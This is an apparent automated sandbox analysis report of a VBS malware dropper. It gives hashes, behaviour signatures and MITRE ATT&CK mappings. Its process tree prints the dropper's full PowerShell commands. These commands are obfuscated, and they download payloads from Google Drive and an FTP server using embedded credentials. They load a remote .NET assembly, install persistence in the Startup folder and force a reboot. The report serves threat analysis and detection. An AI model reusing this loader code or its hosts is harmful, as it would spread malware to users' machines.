c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f

General

Target

demeOnay.vbs
Size

586KB
MD5

dbc2b2c1ad1e78348f9336869fbf0740
SHA1

7903a4142cb3c3e588710691a8577e5b7ee3c6c6
SHA256

c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f
SHA512

b4751bcaa288a9f0c74e7fac9bd7e9dc74422c71694300debdefebdc42bc077016bb07b2d928be4eb4d9cb16b18e744be35c82d2e2a53a7a0c290692772b94b2
SSDEEP

1536:coooooooooooooooooC99999999999999999999999999999999999999999999/:v3Jg6azbLal3Jg6azbLal3Jg6azbLaO

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2836	powershell.exe
7	2836	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2652	powershell.exe
2836	powershell.exe
2028	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demeOnay.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demeOnay.vbs	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2652	powershell.exe
2836	powershell.exe
2280	powershell.exe
2028	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2196 wrote to memory of 2652	2196	WScript.exe	30
PID 2196 wrote to memory of 2652	2196	WScript.exe	30
PID 2196 wrote to memory of 2652	2196	WScript.exe	30
PID 2652 wrote to memory of 2836	2652	powershell.exe	32
PID 2652 wrote to memory of 2836	2652	powershell.exe	32
PID 2652 wrote to memory of 2836	2652	powershell.exe	32
PID 2836 wrote to memory of 2280	2836	powershell.exe	33
PID 2836 wrote to memory of 2280	2836	powershell.exe	33
PID 2836 wrote to memory of 2280	2836	powershell.exe	33
PID 2280 wrote to memory of 2252	2280	powershell.exe	34
PID 2280 wrote to memory of 2252	2280	powershell.exe	34
PID 2280 wrote to memory of 2252	2280	powershell.exe	34
PID 2836 wrote to memory of 2028	2836	powershell.exe	35
PID 2836 wrote to memory of 2028	2836	powershell.exe	35
PID 2836 wrote to memory of 2028	2836	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'lAGwAZQ' + [char]66 + 'jAHQAag' + [char]66 + 'pAG0AaA' + [char]66 + 'lAG4AZA' + [char]66 + 'lAHIAcw' + [char]66 + 'vAG4ALg' + [char]66 + 'jAG8AbQAvAHoALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAIAArACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAIAAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACcASQ' + [char]66 + 'WAEYAcg' + [char]66 + 'wACcAIAA9ACAAbQ' + [char]66 + 'HAHEAaQ' + [char]66 + 'uACQAOwAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAOwAnAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACAAPQAgAEcAaQ' + [char]66 + 'UAHoASgAkADsAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIAA9ACAAbw' + [char]66 + 'UAFIAaA' + [char]66 + 'YACQAOwApACAAKQAnAEEAJwAsACcAkyE6AJMhJwAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAHIALg' + [char]66 + 'mAGIAcg' + [char]66 + 'zAG0AJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACAAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAoACAAPQAgAGYAYg' + [char]66 + 'yAHMAbQAkADsAIAAgAH0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + '0AHAAaw' + [char]66 + 'mAHkAJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwAgACkAIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAdA' + [char]66 + 'wAGsAZg' + [char]66 + '5ACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJA' + [char]66 + '7ACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIAAxAC4AMAAuADAALgA3ADIAMQAgAGcAbg' + [char]66 + 'pAHAAOwAgAGMALwAgAGUAeA' + [char]66 + 'lAC4AZA' + [char]66 + 'tAGMAOw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + 'oAGYAZA' + [char]66 + 'wAG4AJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwApACkAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwAtACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'GAC0AIA' + [char]66 + '0AHgAZQ' + [char]66 + 'UAG4AaQ' + [char]66 + 'hAGwAUA' + [char]66 + 'zAEEALQAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGUAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC0Abw' + [char]66 + 'UAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMAKAAgACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAFMAUAAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAoACAAPQAgAGgAZg' + [char]66 + 'kAHAAbgAkADsAIAAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACAAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + [char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIAbA' + [char]66 + 'wAGsAdAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAAPQAgAEIAbA' + [char]66 + 'wAGsAdAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAOwApACAAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAALA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4Acw' + [char]66 + '4AHYAZA' + [char]66 + '5ACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHMAeA' + [char]66 + '2AGQAeQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHMAeA' + [char]66 + '2AGQAeQAkADsAfQA7ACAAKQAnAHQATw' + [char]66 + 'MAGMAXw' + [char]66 + 'LAGEAMw' + [char]66 + 'aAGYAbw' + [char]66 + 'YADIASg' + [char]66 + 'KAHIAVg' + [char]66 + 'oAG0AVgA5AGMAbQA5AFgAcw' + [char]66 + '1AFgAbQ' + [char]66 + 'qADEAZwAxACcAIAArACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAKAAgAD0AIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAMgA0AHUAWA' + [char]66 + 'KAFQAcQ' + [char]66 + 'hAG0AZw' + [char]66 + '5AE0AdA' + [char]66 + 'GAHoAYQ' + [char]66 + 'rAFAAUgAxAHEAXw' + [char]66 + 'JAHYARw' + [char]66 + 'pAFgATg' + [char]66 + 'kAHEAYQ' + [char]66 + 'OADEAJwAgACsAIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoACAAPQAgAHcAdw' + [char]66 + 'zAGcAZwAkAHsAIAApACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHUAbw' + [char]66 + 'XAFoAVAAkAHsAIAApACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAA7AA==';$nqqkv = $qKKzc; ;$nqqkv = $qKKzc.replace('уЦϚ' , 'B') ;;$zmmdr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nqqkv ) ); $zmmdr = $zmmdr[-1..-$zmmdr.Length] -join '';$zmmdr = $zmmdr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs');powershell $zmmdr
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ggsww = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ggsww = ($ggsww + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ggsww = ($ggsww + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$ydvxs = (New-Object Net.WebClient);$ydvxs.Encoding = [System.Text.Encoding]::UTF8;$ydvxs.DownloadFile($ggsww, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$npdfh = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $npdfh -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$yfkpt = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $yfkpt -OutFile $obTxq -UseBasicParsing } ;$msrbf = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $msrbf.replace('↓:↓','A') );$XhRTo = 'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/moc.nosrednehmijtcele//:sptth' , $XhRTo , 'D DD' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2280
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8cbbdf801d2c974332545feb05ed7284

SHA1
d287e6fb7966714cac8ffc57f0999abbf0fffc6a

SHA256
b9be292b8067c62537333b2be976328f722ce1208a407434d34e528585c9389c

SHA512
624e74c416f77c8c7fd26dd279e76d497f8c5ae997f2276726a81969ca1e3efa2c856847b3ebd35a4fbe105bc8be1ffedd5be1e0b1808be508ed303e01feff8f

Download Submit
memory/2652-4-0x000007FEF642E000-0x000007FEF642F000-memory.dmp

Filesize
4KB

Download
memory/2652-7-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download
memory/2652-5-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2652-9-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-8-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-10-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download
memory/2652-16-0x000007FEF642E000-0x000007FEF642F000-memory.dmp

Filesize
4KB

Download
memory/2652-17-0x000007FEF6170000-0x000007FEF6B0D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing